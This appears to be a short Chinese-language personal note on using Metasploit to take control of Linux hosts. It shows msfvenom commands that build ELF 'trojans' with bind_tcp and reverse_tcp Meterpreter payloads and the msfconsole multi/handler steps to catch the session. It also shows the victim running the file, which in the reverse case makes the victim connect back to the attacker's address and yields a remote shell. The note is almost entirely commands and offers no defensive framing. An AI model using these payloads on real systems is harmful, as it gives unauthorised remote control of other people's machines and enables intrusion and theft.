【笔记】MSF实现Linux上线

前言

MSF实现Linux上线

TCP协议

正向连接

攻击者生成木马

<port_local>:受害者开放的端口号
-f elf:定义输出的文件类型
-o x.elf:定义输出的文件路径

1
msfvenom -p linux/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=<port_local> -f elf -o x.elf

受害者执行木马

  • 受害者执行木马,会自动监听端口,等待msf主动连接
1
./x.elf

攻击者建立连接

<ip_remote>:受害者IP地址
<port_remote>:受害者端口号

1
2
3
4
5
6
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/meterpreter/bind_tcp
msf exploit(multi/handler) > set rhost <ip_remote>
msf exploit(multi/handler) > set rport <port_remote>
msf exploit(multi/handler) > set run
1
meterpreter > 

反向连接

攻击者生成木马

<ip_local>:攻击者IP地址
<port_local>:攻击者端口号
-f elf:定义输出的文件类型
-o x.elf:定义输出的文件路径

1
msfvenom -p linux/meterpreter/reverse_tcp LHOST=<ip_local> LPORT=<port_local> -f elf -o x.elf

攻击者监听反弹Shell

1
2
3
4
5
6
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 0.0.0.0
msf exploit(multi/handler) > set lport <port>
msf exploit(multi/handler) > run
  • nc监听的反弹Shell也可以得到msf木马反弹的Shell

受害者执行木马

  • 受害者执行木马,会主动连接msf服务端
1
./x.elf
  • 上线成功后,攻击者可以看到新的会话
1
meterpreter > 

完成